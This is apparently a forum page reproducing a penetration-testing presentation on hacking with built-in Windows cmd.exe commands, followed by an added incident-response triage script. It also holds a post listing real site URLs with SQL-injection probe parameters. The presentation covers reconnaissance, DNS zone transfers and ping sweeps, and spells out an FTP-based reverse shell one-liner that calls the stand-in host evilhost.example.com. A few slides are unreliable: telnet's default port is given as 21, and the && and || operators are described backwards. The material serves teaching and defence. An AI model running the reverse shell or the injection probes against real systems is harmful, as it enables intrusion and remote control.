Leaderboard

Popular Content

Showing content with the highest reputation on 05/05/10 in all areas

  1. Websites - Web marketing - Search Engine Indexing - Domain Registration http://www.puntodistella.it/ricerca.asp?Keyword='&B1=' http://www.voceditalia.it/articolo.asp?' http://www.torreomnia.it/forum/leggi.asp?id=45566' It's just an off-topic post, don't mind it... I'm rambling too... a word to the 'posting hunt' amateurs: don't spoil it with hack requests and the like, because in this case you're no better than them!
    -1 points
  2. Chris Clymer, CISSP
     ChrisClymer.com/articles/hacking_windows

     Who am I?
     - I'm not an MCP, MCSE, MCTS, MCPD, MCITP, or MCA
     - I'm not even very good at Minesweeper
     - I'm a UNIX geek
     - I love the command line
     - How much you ask? This entire presentation was created by writing out HTML markup by hand in the Vim text editor

     Why are you getting Windows tips from a UNIX guy?
     - It turns out that for some reason, not every system runs UNIX
     - In fact, the ones we're most concerned about in Information Security are often running Windows (strange!)
     - Bearded UNIX guys need to get cozy in the WIN32 world
     - Windows veterans benefit from learning to better leverage their OS's CLI
     - This presentation could also be called "How I learned to stop installing CYGWIN and love command.exe"

     Why hack without your tools?
     - You can't always guarantee that you'll have your toolbox available
     - Relying on your tools can limit you
     - You want to impress women with your leet CLI skills
     - The vast majority of the commands I will show you today should work on a typical modern Windows installation

     Our friend command.exe
     - This lab will focus on command.exe
     - Powershell, VB, and WMIC are all powerful tools...but command.exe is the least common denominator on all Windows platforms
     - You can launch it by going to Start -> Run -> cmd

     Our Building Blocks
     - Find \i "foo" file - searches through the file "file" for the string "foo". The "\i" makes it case-insensitive
     - Ping -n 5 host - sends 5 ICMP ping packets to host
     - Telnet host port - spawns an interactive telnet session to host. If port is specified, this is used instead of the default Telnet port of 21

     Command Control and Redirection
     - command1 & command2 - Run command1 and then command2
     - command1 && command2 - Run command1 only if command2 runs successfully
     - command1 || command2 - Execute command1 only when command2 does NOT run successfully
     - command > "output.txt" - Redirect output from command to the file "output.txt". Create this file if it does not exist.
     - command >> "output.txt" - Concatenate output from command onto the end of file "output.txt"
     - command1 | command2 - Pipe the output of command1 into command2
     - You can direct the errors from a command using 2> errors.txt

     System Reconnaissance
     - set - show environment variables
     - net user - show local users
     - net localgroups - show local groups
     - sc query - list running services
     - sc query state= all - list all services
     - wmic process list full - show details on all running processes
     - tasklist /svc - show all running processes and associated services

     Network Reconnaissance
     - netstat -nao - show all current network activity, including PIDs
     - netsh firewall show config - display windows firewall configuration
     - ipconfig /displaydns - systems this host has recently resolved through DNS
     - arp -a - systems on the same subnet this host has recently communicated with
     - nslookup - all purpose DNS query tool

     Let's Try One
     - Clear your DNS cache: ipconfig /flushdns
     - ipconfig /displaydns should only show your localhost

     Let's Try One
     - Now let's add an entry: ping google.com
     - Another ipconfig /displaydns should show the new entry for google.com

     More on Nslookup
     - nslookup somehost - will lookup that host in DNS based on your localhost's DNS configuration
     - nslookup - starts nslookup in interactive mode
     - set type=any - configures nslookup to pull down all DNS information including MX, A, CNAME, NS, and PTR
     - ls -d example.com - if the server allows it, does a zone transfer of example.com
     - ls -t example.com - will give a list of member servers from the domain

     Fun with Telnet!
     - Telnet is just an outdated, insecure remote administration tool right?
     - What happens when you telnet to a port other than 21?
     - Turns out many protocols are simple enough to interact with over telnet
     - Telnet can stand in for Netcat for 1-way communication with remote hosts

     Let's test out some HTTP
     - You won't be able to see what you're typing once you've started telnet
     - First type GET /index.html http/1.1 and hit return

     Let's test out some HTTP
     - You should see something like the response below

     Let's test out some BAD HTTP
     - This time we'll type GET blah
     - This time we get an error page since we're not passing a valid HTTP query
     - This is often more helpful, as many HTTP servers happily provide useful information in their error pages

     What about SMTP?
     - Start out by telnetting to a mailserver on port 25: telnet smtp.gmail.com 25
     - Now that we're talking to the server we'll start the session by typing EHLO and then hitting enter
     - Type quit when ready to end the session
     - If you know your SMTP syntax, you can send email this way

     Telnet isn't the only choice
     - Many default Windows CLI apps can interact with a network
     - Many of these offer shell-like functionality and flexibility
     - These apps can fill your Netcat niche when uploading nc.exe isn't an option

     Reverse shell using FTP
     echo OPEN evilhost.example.com > ftp.txt & echo USER haxeduser >> ftp.txt & echo haxedpw >> ftp.txt & echo PUT output.txt >> ftp.txt & echo DELETE commands.txt >> ftp.txt & echo BYE >> ftp.txt & for /L %i in (1,0,2) do (ftp -n -s:ftp.txt & del output.txt & (for /F "delims=^" %j in (commands.txt) do cmd.exe /c %j l>output.txt & del commands.txt) & ping -n 4 127.0.0.1)

     Explanation of FTP Reverse Shell
     - This command will be run on a compromised host
     - The command will connect to our host "evilhost" as user "haxeduser" and password "haxedpw"
     - Next it will upload the content of "output.txt" to evilhost
     - Finally it will download "commands.txt" from evilhost, and run whatever is inside
     - All of this is done in an infinite loop
     - As long as the commands in "commands.txt" direct their output to "output.txt", evilhost will get the results

     Let's Talk About Loops
     - FOR /L - these loops are counters: FOR /L %i in (1,1,10) do echo "Hello World" - prints "Hello World" 10 times
     - FOR /F - these loops are iterators: FOR /F %i IN (foo.txt) DO (echo %i) - prints the content of foo.txt line by line

     Neat Shell Control Tricks
     - FOR /L %i IN (1,0,2) DO foo - an infinite loop. Counts from 1 to 2 in increments of 0
     - ping -n 4 127.0.0.1 - effectively "sleep 4". The windows shell has no "sleep" command, so a local ping can stand in

     Network Scanning with Ping
     FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"
     - This command will ping every host from 10.10.10.1 - 10.10.10.255
     - By using find to parse through the results for "Reply" we only see the hosts which are responding
     - By using @ping we prevent the ping commands themselves from showing in the terminal

     Reverse DNS Lookups
     FOR /L %i IN (1,1,255) DO @echo 10.10.10.%i IN: & @nslookup 10.10.10.%i 2>nul | find "Name"
     - Once again we're iterating through all hosts in the 10.10.10.0/24 network
     - This time we will first echo each host's IP to the terminal
     - Next we'll run the nslookup command for each IP, suppressing both the command and its errors...all we get is the good output!
     - Searching through the results for "Name" gets us the part we care about

     Other Useful Commands
     - type - show the contents of a file
     - openfiles /local on - enable openfiles logging (requires reboot)
     - openfiles /query /v - show details on all open files
     - reg query [KeyName] - display value of registry key [KeyName]
     - net use - mount fileshare

     Resources
     - "Pen-Test Ninjitsu: Part 1" - Core Security Technologies
     - "Built-in Windows Commands to Determine if a System has been Hacked"
     - "Nslookup and DNS Zone Transfers"
     - SANS 560 Network Penetration Testing and Ethical Hacking - Ed Skoudis (SANS: Computer Security Training, Network Security Research, InfoSec Resources)
     - Windows Command Line Second Edition - William Stanek (Microsoft Press)
     - "Creating a Remote Command Shell using Default Windows Command Line Tools" - Kevin Bong, SANSFire 2008

     SANS 560
     - If you found this lab useful, I strongly recommend taking Ed Skoudis's SANS 560 course
     - Ed is the best resource I have found for this sort of usage of the Windows CLI
     - Much of this lab was based on my experience taking the 560 course
     - Ed's 1-day Windows Scripting course covers this material as well
     - Plus he's got much better war stories than I do!

     Hacking From the Windows Command Line
    -1 points
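An added example, not part of the post above or of Chris Clymer's presentation: the "System Reconnaissance" and "Network Reconnaissance" commands from the slides, plus the redirection operators and FOR /F tokenizing the slides describe, assembled into a cmd.exe triage script that a responder can run to snapshot a host with nothing but built-in tools. The output folder name and the ".corp.example" internal DNS suffix are placeholders; the script assumes an elevated prompt on the host being examined and that certutil is available (it ships with Windows Vista and later).

```batch
@echo off
REM triage.cmd -- added example, not from the original post or the presentation.
REM Collects the reconnaissance outputs listed in the post into one folder
REM using only cmd.exe built-ins, so a responder can snapshot a host before
REM anything on it is changed.
REM Assumptions: run from an elevated prompt on the host being examined;
REM the output folder name and the ".corp.example" DNS suffix are placeholders.
setlocal

set "OUT=%COMPUTERNAME%_triage"
if not exist "%OUT%" mkdir "%OUT%" || (echo Cannot create %OUT% & exit /b 1)

REM One file per command; stderr from every command is appended (2>>) to
REM errors.txt so a failed or missing tool is visible in the report.
echo [%DATE% %TIME%] collection started on %COMPUTERNAME% > "%OUT%\errors.txt"
set > "%OUT%\env.txt" 2>> "%OUT%\errors.txt"
net user > "%OUT%\users.txt" 2>> "%OUT%\errors.txt"
net localgroup > "%OUT%\groups.txt" 2>> "%OUT%\errors.txt"
sc query state= all > "%OUT%\services.txt" 2>> "%OUT%\errors.txt"
tasklist /svc > "%OUT%\tasks.txt" 2>> "%OUT%\errors.txt"
netstat -nao > "%OUT%\netstat.txt" 2>> "%OUT%\errors.txt"
netsh firewall show config > "%OUT%\firewall.txt" 2>> "%OUT%\errors.txt"
ipconfig /displaydns > "%OUT%\dnscache.txt" 2>> "%OUT%\errors.txt"
arp -a > "%OUT%\arp.txt" 2>> "%OUT%\errors.txt"

REM Listening sockets and the process behind each one. FOR /F tokenizes the
REM netstat output; token 5 of a TCP LISTENING line is the owning PID, and
REM tasklist /FI filters on it. The pipe inside the FOR command is escaped
REM with ^ so cmd.exe hands it to the inner command rather than the outer one.
REM "INFO:" lines are dropped because tasklist prints one when a PID is gone.
(for /F "tokens=5" %%p in ('netstat -nao ^| find "LISTENING"') do (
    echo PID %%p
    tasklist /svc /FI "PID eq %%p" | find /v "INFO:"
)) > "%OUT%\listening.txt" 2>> "%OUT%\errors.txt"

REM Names in the resolver cache that do not belong to the internal domain.
REM find /i matches case-insensitively; find /v prints the non-matching lines.
type "%OUT%\dnscache.txt" | find /i "Record Name" | find /v /i ".corp.example" > "%OUT%\dns_external.txt"

REM Hash every collected file so the report can later be shown unchanged.
for %%f in ("%OUT%\*.txt") do certutil -hashfile "%%~f" SHA256 >> "%OUT%\hashes.sha256" 2>nul

REM && runs the second command only when the first one succeeded.
echo Collection finished: %OUT% && dir /b "%OUT%"
endlocal
```

Copy the resulting folder off the host before reviewing it; listening.txt pairs each listening port with its service names, and dns_external.txt is a quick list of outside names the host has resolved, which is usually the first thing worth reading after a suspected compromise.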